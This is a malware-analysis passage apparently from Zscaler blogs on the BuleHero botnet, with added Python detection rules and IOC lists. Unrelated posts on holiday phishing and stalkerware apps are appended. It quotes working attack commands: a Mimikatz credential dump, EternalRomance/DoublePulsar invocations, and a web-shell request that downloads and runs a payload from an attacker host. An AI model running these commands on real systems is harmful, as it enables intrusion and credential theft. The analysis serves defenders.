cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 135
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 445
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 80
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 88
In this version of the BuleHero botnet, we also observed scanning for the RDP service. The botnet runs this scan against a hard-coded IP range, 222.186.55.1-222.186.155.255, and also checks port 80 on that range. It saves the IP addresses that have ports 80 and 3389 open to Scantest.txt. The port scans run sequentially and their results accumulate in Result.txt; the output of the scanning process is the list of live IP addresses with those ports open.
cmd /c vqfevffuz.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ Scantest.txt
Interestingly, the botnet deletes the generated “Scantest.txt” file without using it. This suggests that the BuleHero authors are working on integrating RDP scanning, possibly to enable future RDP exploits such as BlueKeep or traditional brute-force attacks against the RDP service.
Fig 7: RDP scanning
Lateral movement components
Mimikatz
The botnet drops the Mimikatz tool at “C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe” to dump passwords from the infected host. These passwords are then used to log into other systems on the network.
cmd /c C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\ziheeghmq\\Corporate\\log.txt
Fig 8: Running Mimikatz to extract credentials
These obtained passwords are then used by PsExec and WMIC to spread the malware onto the network.
PsExec and WMIC
The botnet drops the PsExec tool at the location “C:\\Windows\\ziheeghmq\\Corporate\\scvhost.exe” and it uses the WMIC tool, which is already present on Windows systems. The botnet first launches PsExec to execute the malware on a remote machine, but if it fails it then uses WMIC to execute the malware.
Along with the credentials obtained by Mimikatz, the botnet carries a dictionary of usernames and passwords for brute-forcing remote machines.
PsExec command: scvhost.exe /accepteula \\[remote_machine] -d -c -u -p “cmd.exe /c [command]”
Fig 9: Remote execution using PsExec
WMIC command: wmic.exe /node:[targetMachine] /user:[userName] /password:[password] process call create “cmd.exe /c [command]”
Fig 10: Remote execution using WMIC
SMB Exploitation
The botnet stores a Fuzzbunch-like SMB exploitation toolkit from the Shadow Brokers' leak of NSA tools in the directory “C:\\Windows\\ziheeghmq\\UnattendGC.” The toolkit contains the EternalBlue, EternalRomance, and EternalChampion exploits, the DoublePulsar backdoor, and the SMBtouch utility.
Fig 11: SMB exploits package
The botnet reads the port scanner's results for ports 139 and 445 from “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\Result.txt” and then runs the SMBtouch utility against those hosts to find vulnerable ones.
SMBtouch command: vimpcsvc.exe --InConfig vimpcsvc.xml --TargetIp 106.51.178.148 --TargetPort 445 --NetworkTimeout 60 --Protocol SMB --OutConfig 106.51.178.148.xml
It then launches SMB exploits onto the vulnerable machine with shellcode, which injects the final payload (AppCapture32.dll or AppCapture64.dll) into one of the legitimate processes of the target machine. Below is one such example in which we observed that EternalRomance was being used to exploit the system.
EternalRomance and DoublePulsar command: cmd /c docmicfg.exe --InConfig docmicfg.xml --TargetIp 106.51.3.141 --TargetPort 445 --NetworkTimeout 30 --Protocol SMB --Target WIN7_SP1 --TargetOsArchitecture x86 --Credentials Anonymous --PipeName samr --ShellcodeFile Shellcode.ini & svschost.exe --InConfig svschost.xml --TargetIp 106.51.3.141 --TargetPort 445 --DllPayload AppCapture32.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
The payload DLL downloads the BuleHero malware from “hxxp://fk.0xbdairolkoie[.]website/download.exe” and stores it at “C:\\WebKit\\2.250.20\\fxxkmylife0xa.exe” before executing it.
Fig 12: Payload after SMB exploitation
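The command lines quoted in the scanning, Mimikatz, PsExec/WMIC and SMB-exploitation sections above share distinctive argument shapes even though the binaries are renamed (vqfevffuz.exe, vfshost.exe, scvhost.exe, vimpcsvc.exe, svschost.exe). Below is an added detection example, written for this page and not code from the Zscaler write-up or from the botnet: it matches those shapes in process-creation telemetry and then correlates a port sweep, a credential dump and a remote execution into one lateral-movement alert. The pipe-delimited event lines, the 10.0.0.x targets, the user1/pass1 credentials and the 30-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed process-creation events (timestamp|image|command line), modelled on the
# command shapes quoted in the write-up. Hosts 10.0.0.x and user1/pass1 are placeholders.
SAMPLE_EVENTS = [
    r"2019-11-20T10:00:01Z|C:\Windows\System32\cmd.exe|cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8080",
    r"2019-11-20T10:00:07Z|C:\Windows\System32\cmd.exe|cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 445",
    r"2019-11-20T10:00:09Z|C:\Windows\System32\cmd.exe|cmd /c vqfevffuz.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ Scantest.txt",
    r"2019-11-20T10:01:12Z|C:\Windows\System32\cmd.exe|cmd /c C:\Windows\ziheeghmq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit",
    r"2019-11-20T10:02:30Z|C:\Windows\ziheeghmq\Corporate\scvhost.exe|scvhost.exe /accepteula \\10.0.0.25 -d -c -u user1 -p pass1 cmd.exe /c [command]",
    r"2019-11-20T10:02:45Z|C:\Windows\System32\wbem\wmic.exe|wmic.exe /node:10.0.0.25 /user:user1 /password:pass1 process call create cmd.exe /c [command]",
    r"2019-11-20T10:03:10Z|C:\Windows\ziheeghmq\UnattendGC\vimpcsvc.exe|vimpcsvc.exe --InConfig vimpcsvc.xml --TargetIp 10.0.0.40 --TargetPort 445 --NetworkTimeout 60 --Protocol SMB --OutConfig 10.0.0.40.xml",
    r"2019-11-20T10:03:20Z|C:\Windows\ziheeghmq\UnattendGC\svschost.exe|svschost.exe --InConfig svschost.xml --TargetIp 10.0.0.40 --TargetPort 445 --DllPayload AppCapture32.dll --DllOrdinal 1 --Protocol SMB",
    r"2019-11-20T10:05:00Z|C:\Windows\System32\cmd.exe|cmd /c ping -n 1 10.0.0.1",
]

# Each rule keys on argument shape, not on the (renamed) binary. The capture group, where
# present, pulls out the scanned port list, the scanned range or the remote target.
RULES = [
    ("port-sweep",          re.compile(r"-iL\s+\S+\s+-oJ\s+\S+\s+--open\s+--rate\s+\d+\s+-p\s+([\d,]+)")),
    ("range-scan-rdp",      re.compile(r"-p\s*80,3389\s+(\S+)\s+--rate=\d+\s+-oJ\s+\S+")),
    ("mimikatz",            re.compile(r"privilege::debug|sekurlsa::logonpasswords", re.I)),
    ("psexec-remote-exec",  re.compile(r"/accepteula\s+\\\\(\S+)", re.I)),
    ("wmic-remote-exec",    re.compile(r"wmic(?:\.exe)?\s+/node:(\S+)\s+/user:\S+\s+/password:\S+\s+process\s+call\s+create", re.I)),
    ("smb-touch",           re.compile(r"--InConfig\s+\S+\s+--TargetIp\s+(\d+(?:\.\d+){3})\s+--TargetPort\s+445.*--OutConfig", re.I)),
    ("doublepulsar-inject", re.compile(r"--TargetIp\s+(\d+(?:\.\d+){3}).*--DllPayload\s+\S+\.dll\s+--DllOrdinal", re.I)),
]


def parse_event(line: str):
    ts, image, cmdline = line.split("|", 2)
    return datetime.fromisoformat(ts.rstrip("Z")), image, cmdline


def detect(events: List[str]) -> List[Dict]:
    """Run every rule over every command line; one hit per matching rule."""
    hits = []
    for line in events:
        when, image, cmdline = parse_event(line)
        for name, rx in RULES:
            m = rx.search(cmdline)
            if m:
                hits.append({"time": when, "rule": name, "image": image,
                             "detail": m.group(1) if m.groups() else None})
    return hits


def swept_ports(hits: List[Dict]) -> List[int]:
    """Distinct ports the host has been sweeping for, from the port-sweep hits."""
    return sorted({int(p) for h in hits if h["rule"] == "port-sweep" for p in h["detail"].split(",")})


def lateral_movement_chain(hits: List[Dict], window_minutes: int = 30) -> Optional[Dict]:
    """Correlate weak signals into a strong one: sweep, then credential dump, then remote
    execution, in that order and each within `window_minutes` of the previous step."""
    window = timedelta(minutes=window_minutes)
    sweeps = [h for h in hits if h["rule"] == "port-sweep"]
    dumps = [h for h in hits if h["rule"] == "mimikatz"]
    execs = [h for h in hits if h["rule"] in ("psexec-remote-exec", "wmic-remote-exec")]
    for s in sweeps:
        for d in dumps:
            if not (s["time"] <= d["time"] <= s["time"] + window):
                continue
            for e in execs:
                if d["time"] <= e["time"] <= d["time"] + window:
                    return {"sweep": s, "dump": d, "exec": e}
    return None


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(h["time"].isoformat(), h["rule"], h["detail"] or "")
    print("ports swept:", swept_ports(found))
    chain = lateral_movement_chain(found)
    print("lateral movement chain:", "yes, target " + chain["exec"]["detail"] if chain else "no")
```

Any one of these rules on its own is noisy (administrators run PsExec and WMIC too); the value is in the chain, which is why `lateral_movement_chain` only fires when a sweep, a dump and a remote execution line up in order on the same host.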
Along with the SMB exploits, the botnet carries exploits for well-known web applications. These are fired at the web servers found in the port scanning results.
Web Application Exploits
Apache Tomcat PUTs vulnerability (CVE-2017-12615)
This vulnerability affects Apache Tomcat 7.0.0 to 7.0.79 on Windows with the HTTP PUT method enabled. The botnet uses it to upload a maliciously crafted JSP file to the server.
Fig 13: Crafting request after uploading FxCodeShell.jsp
Exploit: /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http%3A%2F%2Ffk.0xbdairolkoie.space%2Fdownload.exe
Apache Struts RCE vulnerability (CVE-2017-5638)
This vulnerability affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. Apache Struts is a free and open-source framework used to build Java web applications. This particular vulnerability can be exploited if the attacker sends a crafted request to upload a file to a vulnerable server that uses a Jakarta-based plugin to process the upload request. The attacker can then send malicious code in the "Content-Type" header to execute the command on a vulnerable server.
Fig 14: Crafting request to exploit Apache Struts vulnerability
Exploit: /struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data')... Post.Open "GET","hxxp://fk.0xbdairolkoie[.]website/download.exe",0 >>..
Oracle WebLogic server vulnerability (CVE-2018-2628)
This vulnerability allows an unauthenticated attacker with network access via the T3 protocol to compromise an Oracle WebLogic Server running on port 7001. The affected versions are 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3.
Fig 15: Sending the T3 handshake request
Fig 16: Sending the payload to execute on the server
WebLogic Deserialization RCE vulnerability (CVE-2019-2725)
Oracle WebLogic Server is prone to a remote command-execution vulnerability due to deserializing input information. Specifically, this issue affects the "wls9_async" and "wls-wsat" components. An attacker can exploit this issue to execute arbitrary commands. The affected versions are 10.3.6.0.0 and 12.1.3.0.0.
Fig 17: Constructing malicious payload request
Exploit: :port/wls-wsat/CoordinatorPortType OR :port/_async/AsyncResponseService
Data: payload
Oracle WebLogic Server vulnerability (CVE-2017-10271)
This vulnerability in the WLS Security component of Oracle WebLogic Server allows an unauthenticated attacker with network access via the T3 protocol to compromise the server. The affected versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0.
Fig 18: Constructing malicious payload request
ThinkPHP v5 Remote Code Execution vulnerability
This vulnerability exists because the ThinkPHP5 framework does not strictly filter the controller name, which allows an attacker to call sensitive functions inside the framework through the URL and so download and install malware.
Using this vulnerability, the botnet tries to download and execute malware by launching PowerShell from cmd.
Fig 19: ThinkPHP vulnerability to download and execute malware
Through the same vulnerability it installs hydra.php, a web shell that executes commands.
Fig 20: ThinkPHP vulnerability to install malware by web-shell
It then uses hydra.php to launch PowerShell from cmd, which downloads and executes the malware.
Fig 21: ThinkPHP vulnerability to download and execute malware by hydra.php
Exploit: GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie[.]website/download.exe','C:/WebKit/2.250.20/12.exe');start%20C:/WebKit/2.250.20/12.exe
Drupal Remote Code Execution vulnerability (CVE-2018-7600)
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. It allows an attacker to inject a malicious payload into a form structure to execute arbitrary code.
Fig 22: Construct a request payload to exploit Drupal vulnerability
Exploit: URL: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Payload: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]= “malicious commands”
Apache Solr Remote Code Execution vulnerability (CVE-2019-0193)
This vulnerability exists in the DataImportHandler (DIH) module, which is commonly used to import data from databases or other sources. The entire DIH configuration can be supplied through the dataConfig parameter of an external request; since a DIH configuration can contain scripts, this parameter is a security risk.
An attacker could exploit this vulnerability to achieve arbitrary code execution via a malicious request carrying a crafted dataConfig parameter. Affected versions: Apache Solr
PHPStudy backdoor
The BuleHero malware checks whether either of the PHP module paths below exists and, if so, replaces that module with an embedded backdoor that allows an attacker to execute any command on the server.
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
This module is the same one that was spread from the official PhpStudy site when it was compromised; the purpose of these implanted backdoors was mainly remote code execution.
Fig 24: Dropping php_xmlrpc.dll if the module already exists
Besides backdooring the infected system, the malware sends requests to the scanned IPs to make them download and execute the payload.
Fig 25: Crafting a request with malicious payload
Exploit: URL: /index.php
Accept-Encoding: gzip,deflate
Accept-Charset:
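The exploit requests quoted across the web-application section (the Tomcat PUT and FxCodeShell.jsp, the Struts Content-Type, the WebLogic wls-wsat and _async endpoints, hydra.php?xcmd=, the Drupal /user/register form payload, the Solr dataConfig parameter, and the index.php request with an odd Accept-Charset header from Fig 25) can be turned into detection logic on the web-server or WAF side. The following is an added example written for this page, not code from the write-up or from any of the affected projects: it classifies constructed request records against those shapes. The record format, the /dataimport handler path assumed for Solr, the placeholder payloads and the small charset allowlist are assumptions.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request records, as a reverse proxy or WAF might log them, modelled on
# the request shapes quoted in the write-up. Hosts, paths and payloads are placeholders.
SAMPLE_REQUESTS = [
    {"method": "PUT",  "path": "/FxCodeShell.jsp", "headers": {}, "body": "<%@ page ... %>"},
    {"method": "GET",  "path": "/FxCodeShell.jsp?view=x&os=1&address=http%3A%2F%2Fexample.invalid%2Fdownload.exe", "headers": {}, "body": ""},
    {"method": "POST", "path": "/struts2-rest-showcase/orders.xhtml",
     "headers": {"Content-Type": "%{(#nike='multipart/form-data')...}"}, "body": ""},
    {"method": "POST", "path": "/wls-wsat/CoordinatorPortType", "headers": {"Content-Type": "text/xml"}, "body": "<soapenv:Envelope>...</soapenv:Envelope>"},
    {"method": "POST", "path": "/_async/AsyncResponseService", "headers": {"Content-Type": "text/xml"}, "body": "<soapenv:Envelope>...</soapenv:Envelope>"},
    {"method": "GET",  "path": "/public/hydra.php?xcmd=cmd.exe%20/c%20[command]", "headers": {}, "body": ""},
    {"method": "POST", "path": "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
     "headers": {}, "body": "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]=[command]"},
    {"method": "POST", "path": "/solr/core1/dataimport?command=full-import&dataConfig=%3CdataConfig%3E...%3C%2FdataConfig%3E", "headers": {}, "body": ""},
    {"method": "GET",  "path": "/index.php", "headers": {"Accept-Encoding": "gzip,deflate", "Accept-Charset": "Y29uc3RydWN0ZWQ="}, "body": ""},
    {"method": "GET",  "path": "/index.php", "headers": {"Accept-Encoding": "gzip, deflate, br", "Accept-Charset": "utf-8, iso-8859-1;q=0.5"}, "body": ""},
    {"method": "GET",  "path": "/products?page=2", "headers": {}, "body": ""},
]

# Charset names a browser would legitimately send (assumed allowlist); anything else is odd.
KNOWN_CHARSETS = {"utf-8", "iso-8859-1", "us-ascii", "windows-1252", "utf-16", "*"}


def odd_accept_charset(value: str) -> bool:
    """True when Accept-Charset carries something that is not a charset name."""
    tokens = [t.split(";")[0].strip().lower() for t in value.split(",")]
    return any(t not in KNOWN_CHARSETS for t in tokens)


def classify(req: Dict) -> List[str]:
    """Return the names of the exploit shapes a single request matches."""
    parts = urlsplit(req["path"])
    path = unquote(parts.path)
    query = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values, e.g. %23 -> #
    headers = {k.lower(): v for k, v in req["headers"].items()}
    ctype = headers.get("content-type", "")
    body = unquote(req.get("body", ""))
    hits = []
    if req["method"] == "PUT" and re.search(r"\.jsp/?$", path, re.I):
        hits.append("tomcat-put-jsp-upload (CVE-2017-12615)")
    if re.search(r"/FxCodeShell\.jsp$", path, re.I) and "address" in query:
        hits.append("tomcat-fxcodeshell-webshell")
    if "%{" in ctype:                                   # OGNL expression where a media type belongs
        hits.append("struts-ognl-content-type (CVE-2017-5638)")
    if req["method"] == "POST" and path in ("/wls-wsat/CoordinatorPortType", "/_async/AsyncResponseService"):
        hits.append("weblogic-xmldecoder-endpoint (CVE-2017-10271 / CVE-2019-2725)")
    if path.endswith("/hydra.php") and "xcmd" in query:
        hits.append("thinkphp-hydra-webshell")
    if (path == "/user/register" and query.get("element_parents", [""])[0].startswith("account/mail/#value")
            and "#post_render" in body):
        hits.append("drupal-form-api-rce (CVE-2018-7600)")
    if path.endswith("/dataimport") and "dataConfig" in query:
        hits.append("solr-dih-dataconfig (CVE-2019-0193)")
    if (path.endswith("/index.php") and headers.get("accept-encoding", "").replace(" ", "") == "gzip,deflate"
            and "accept-charset" in headers and odd_accept_charset(headers["accept-charset"])):
        hits.append("phpstudy-backdoor-accept-charset (weak signal)")
    return hits


def scan(requests: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Index and findings for every request that matched at least one shape."""
    flagged = []
    for i, req in enumerate(requests):
        found = classify(req)
        if found:
            flagged.append((i, found))
    return flagged


if __name__ == "__main__":
    for i, found in scan(SAMPLE_REQUESTS):
        print(f"request #{i} {SAMPLE_REQUESTS[i]['method']} {SAMPLE_REQUESTS[i]['path'][:50]}: {', '.join(found)}")
```

Matching happens on the percent-decoded path and query so that encoding tricks such as `%23` for `#` do not slip past the Drupal rule; the PhpStudy rule is deliberately marked a weak signal because the page shows only the request skeleton, so it should be paired with the file-path check for php_xmlrpc.dll rather than alerting on its own.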
Conclusion
Inclusion of lateral propagation in any type of malware makes it more dangerous, as it can compromise an entire network. By including several exploits and spreading methods, the malware has multiple options, which makes it more robust. We have observed an increase in such malware since 2017. We advise users to keep systems updated with the latest operating system updates and security patches, to harden servers and endpoints, and to keep security software up to date to defend against such malware. Zscaler provides a layered security offering that protects against new and evolving malware like the BuleHero botnet. The inclusion of Cloud IPS in the Zscaler platform protects customers against the exploits used in lateral propagation.
Zscaler protection
Fig 26: Zscaler Sandbox report
IOCs:
URLs:
aa[.]0xbdairolkoie[.]space/xs.exe
aa[.]0xbdairolkoie[.]space/swpuhostd.exe
fk[.]0xbdairolkoie[.]space/download.exe
xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini
qb[.]1c1c1c1c[.]best:63145/cfg[.]ini
ce[.]1c1c1c1c[.]club:63145/cfg[.]ini
jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini
eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini
rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini
ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini
cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini
ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini
aa[.]openyourass[.]icu/xs[.]exe
fk[.]openyourass[.]icu/securitydnsservice[.]exe
fk[.]openyourass[.]icu/download[.]exe
ae86[.]decode0x[.]fun:63145/cfg[.]ini
ae86[.]decode0x[.]host:63145/cfg[.]ini
ae86[.]decode0x[.]icu:63145/cfg[.]ini
ae86[.]decode0x[.]online:63145/cfg[.]ini
ae86[.]decode0x[.]pw:63145/cfg[.]ini
ae86[.]decode0x[.]site:63145/cfg[.]ini
s4f5er4t5g1df23saadse[.]club:63145/cfg[.]ini
ox[.]mygoodluck[.]best
mi.oops[.]best:80
mx.oops[.]best:443
IPs:
172[.]104[.]91[.]191
139[.]162[.]2[.]123
185[.]147[.]34[.]106
185[.]147[.]34[.]136
Hashes:
F864506F9797592321CF4C6A0BB5F199 (xs.exe)
ECB3266326D77741815ECEBB18EE951A (swpuhostd.exe)
1B20076D8470AA308E24A2098786ECDD (svtink.exe)
398FB3FED9BE2941F3548A5D0D4B862C (vqbbqs.exe)
EA774C81FE7B5D9708CAA278CF3F3C68 (vqfevffuz.exe)
1F2E820A81AE38E9E8DC173975AB57A6 (vfshost.exe)
F89544ECBF66E93C2821625861AE8821 (AppCapture32.dll)
B1956FE89E3D032BE3A06820C63F95A6 (AppCapture64.dll)
FB82BA8BB7A402B05D06436991B10321 (ShellCode.ini)
D464F1D389593B6DC285E64BC8B211AC (docmicfg.exe)
6612282F37F7CBDD2A962577FA49EF66 (schoedcl.exe)
22BB1452CA9BC4B8D346368D3F4DB6C2 (spoolsrv.exe)
E4FF1EF997A3A1419F22938F83C91E45 (svschost.exe)
48442048EE3AB045FCB08809597E03B4 (vimpcsvc.exe)
BD5AF8E9AFEA8D8173854F0A0C038B68 (SecurityDnsService.exe)
982C401A9D6F7016D910E8E60F17A0FB (AppCapture32.dll)
6E7E98549BAA186D3A0E3D1840B05ABF (AppCapture64.dll)
A Big Day for Phishing
We hope you enjoyed your own Black Friday and found everything you wanted as you were shopping the sales. The threat actors certainly attempted to take advantage of the zeal of holiday shoppers. As a follow-up to our previous blog on shopping scams, we’d like to show some of the other attacks we saw during the Thanksgiving break. We’ll highlight a few more phishing tactics commonly used, a Magecart POS skimmer attack on a major brand, and further evidence of Emotet’s prevalence in the overall threat landscape.
The primary motivation of attackers is to take advantage of the online shopping season. Sales are already up for most retailers as consumers snap up deals.
Fig 1: Shopping trends continued to rise through November (the spike at the end is Cyber Monday)
Scams and phishing attempts continue at a steady pace into the holiday shopping season. Attackers know that they can cast a wide net of branded phishing attacks, gift card scams, and malicious files to boost their profitability every year.
Fig 2: Phishing attempts rose during the week before Thanksgiving and Black Friday
Magecart
Magecart has been quite active so far. We have observed consistent hits in the weeks leading up to the holiday season and they persist. The chart below shows that Magecart infections are proving to be quite a sustainable means for attackers.
Fig 3: Magecart activity tracked over two months (Oct-Nov 2019)
Recently, threat actors targeted the Macy's website. Macy's released a “Notice Of Data Breach” on November 14, 2019. The company stated that the site was compromised by attackers on October 7, 2019. The attackers had inserted an obfuscated version of a Magecart script to the Macy's Checkout and My Wallet pages. According to the breach notice, attackers were able to capture user credit card data. The user-submitted details were exfiltrated to a command-and-control (C&C) server at barn-x[.]com.
Phishing
As we reported in the previous blog, Amazon has been heavily targeted this season, but it isn’t the only brand under attack. All major brands are considered fair game to threat actors. This season, Apple has become a focus of attackers. Below is one such case.
Fig 4: Fake Apple login page
One of the first things you should do before logging into a sensitive website is to check the address bar to make sure you are in the right place. If you are unfortunate enough to enter your Apple ID into this portal, your information will be sent to the attackers.
Fig 5: Information is sent in clear text to the attackers as well as any other attackers currently performing a man-in-the-middle (MitM) attack
After a phishing attack is successful, users get redirected to a message about their account being locked.
Fig 6: After entering Apple login information, the user receives a message from the attacker saying the account has been locked
Black Friday Phishing
Black Friday offers aren’t just big in the U.S.—the start of the shopping season is celebrated all around the world. The image below shows a phishing page claiming to offer Black Friday deals from Americanas.com.br, a major Brazilian retail chain. Notice the domain: the entire content is hosted on Joomla. A legitimate vendor would never host its products via a content management/publishing framework.
Fig 7: Faked Americanas site being hosted on Joomla
The screen below is another example of threat actors targeting users via a fake Americanas.com.br site. As of the writing of this blog, the domain hosting this page was only five days old.
Fig 8: Faked Americanas site on a newly registered domain
Emotet
In our previous blog, we discussed how webmail was a critical element in Emotet infection downloads. Another attack vector favored by threat actors is leveraging compromised WordPress sites—specifically, SSL-secured WordPress sites. Attackers assume (correctly, in many cases) that consumers don’t have a security solution that inspects encrypted traffic (HTTPS). In fact, when you look at the last 1,000 confirmed Emotet samples on URLhaus, 475 of them at the time of this research were using HTTPS to infect users.
Fig 9: HTTPS is the primary method of infection
Conclusion
The Zscaler ThreatLabZ team will continue to track and block various campaigns and tools used by threat actors. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves, particularly during the shopping season, by reviewing our security checklist:
Change your passwords for critical and important accounts
Enable two-factor authentication, or “2FA”
Ensure HTTPS is inspected by your security solution; check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites
Be vigilant about invoices/orders arriving in email; do not forward such attachments to anyone and be sure to follow IT protocol
Be wary of tracking number links in emails from shipping/courier companies, as they may direct you to malicious sites
Do not click on any links from unrecognized senders; even if you do not follow through, the action of clicking the URL is a beacon for the attacker
Do not provide any credentials via Google docs; legitimate vendors do not ask for credentials via this medium
Avoid using public or unsecured Wi-Fi connections for shopping
Review helpful instructions by the Federal Trade Commission (FTC) on Identity Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware
Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message
Report incidents to the FTC
A New Wave of Stalkerware Apps
Recently, the U.S. Department of Homeland Security (DHS) released an article warning mobile users about the increasing use of spyware apps.
The US-CERT (Computer Emergency Response Team) issued the following statement:
The statement was released just after the Federal Trade Commission (FTC) marked its first case against stalking apps (also known as stalkerware or spyware apps). A case was filed against a company that developed and distributed stalking apps that could track smartphone activities like call history, text messages, photos, locations, browser history, and more. These apps were marketed as apps for monitoring the location and activities of children, employees, or spouses.
According to the FTC's complaint, the company did not take steps to ensure that purchasers were using the apps for legitimate purposes.
During the timeframe when the US-CERT released its statement, we noticed some hits on the Zscaler cloud in relation to spyware activities. We frequently detect the presence of spyware apps such as Spymie, TruthSpy, iSpyoo, GuestSpy, Spynote, NeoSpy, among others, on the Zscaler cloud, but we also found some new actors in this period.
In this blog, we will briefly discuss these new spyware apps. The blog is divided into three parts. First, we discuss typical stalkerware functionalities, then we'll explore some of the different types of spyware apps we've seen in the last few months, and in the final part we'll cover the indicators of compromise (IOCs).
Stalkerware (stalking apps or spyware), as the name suggests, is a type of app that spies on victims. Stalkerware apps are capable of, but not limited to, performing the following functions:
Stealing contacts
Spying on text messages
Stealing photos
Spying on browsing history
Spying on banking apps
Stealing GPS locations
Normally, one is required to have physical access to a mobile device in order to install spyware apps, but an attacker can use social engineering tactics to get the victim to install spyware.
Once installed, the typical spyware app gains admin-level access, hides itself, spies on the victim and, finally, sends the stolen data to the attacker.
The following is a summary of some spyware apps we found on the Zscaler cloud.
Android Monitors
Package Name: com.ibm.fb
Hash : 97c6c8b961d57d4ebad47f5c63ec6446
We saw multiple entries of spyware apps dubbed Android Monitors. Upon looking at the icon, we believe it is in its development phase. Once installed, it cleverly safeguards itself from Google's security framework, Play Protect.
Fig 1: Android Monitor initial setup
The screenshot below shows the functionality of the app's keylogger. If enabled, this app can spy on everything that the victim types, which can include personal WhatsApp messages, Facebook chats, emails, banking activities, and much more.
Fig 2: Android Monitor keylogging
The above screenshot also has an email ID column to which all the stolen data is sent.
The Zscaler analytical system precisely detects this spyware. The following screenshot highlights the main functionalities of the app.
Fig 3: Zscaler Cloud Sandbox with Android Monitor sample
Russ City
Package Name: city.russ.alltrackercorp
Hash: 3b388138584ad3168e745097d5aa4206
This spyware app portrays itself as Thief Tracker. Hunting further for similar samples from the same source, we found two more apps, named System Info and System Updater. On analysis, all three apps turned out to be identical except for their names.
The screenshot below shows how the three spyware apps appeared upon installation:
Fig 4: Spyware app icons
The complete functionality of this spyware can be seen in its manifest file, below.
Fig 5: AndroidManifest.xml
This app performs various background services:
Read text messages
Get browser history
Fetch call logs
Get GPS location
Get clicked photos
Record audio
Record voice calls
Capture screenshots
Fig 6: Android services
Spy Phone App
Package Name: com.spappm_mondow.alarm
Hash : 001209b1e2760f88f2bb4b68f159a473
This app was delivered via Google Drive and contained almost all possible spyware functionalities, as shown in the screenshot below:
Fig 7: Zscaler Sandbox displaying Spy Phone analysis
We found its platform online where the attacker can log in and check all the stolen data stored in this one place.
Fig 8: Spy Phone App control panel
Wi-Fi Settings
Package Name: com.wifiset.service
Hash : 8dab7a558f91e72e3edae8e20ee55c86
This stalkerware portrays itself as a settings app for Wi-Fi. One unique feature of this app is its method for staying persistent. During the installation process, it installs an additional app named Update Settings.
The screenshot below shows this functionality in action.
Fig 9: Initial installation steps
Once the initial setup is done, the attacker enters his or her credentials and leaves the rest to the spyware. As soon as the spyware gets an internet connection, it starts sending the stolen data to a command-and-control (C&C) server. We noticed a major flaw in this spyware: it sends all the stolen data over plain-text HTTP, which exposes the victim's data a second time, to anyone able to observe the traffic. As the following screenshot shows, the user credentials are sent in plain text:
Fig 10: Plain text communication
The screenshot below shows stolen photos being uploaded to the C&C server with basic Base64 encoding.
Fig 11: Spyware uploading photos from the victim's device
Data Controller
Package Name: lookOut.Secure
Hash : 33dcfd84589c6ccf00fa5a302cefd0fe
This app portrays itself as Data Controller and has the package name lookout.Secure. It is strange to see a package called Lookout, as a legitimate company called Lookout is a highly regarded mobile security company. The attacker might have used this package name in order to trick users into trusting the app. Once installed, it asks for the purpose of use and whether the attacker wants to keep it hidden from the victim or not. (Spyware always prefers to hide itself to evade detection.)
Fig 12: Initial installation steps
The Zscaler Cloud Sandbox report shows the major spying capabilities in this spyware:
Fig 13: Sandbox report of the Data Controller app
Auto Forward
Package Name: com.autoforward.monitor
Hash: 66dbd2d7614555440b657ae24527034a
It's common for spyware apps to portray themselves as parental-control apps. This is the case with Auto Forward spyware.
As soon as the spyware is installed, it displays itself as an app named Device. It asks for all available permissions necessary to spy, as shown in the screenshot below:
Fig 14: Initial installation steps
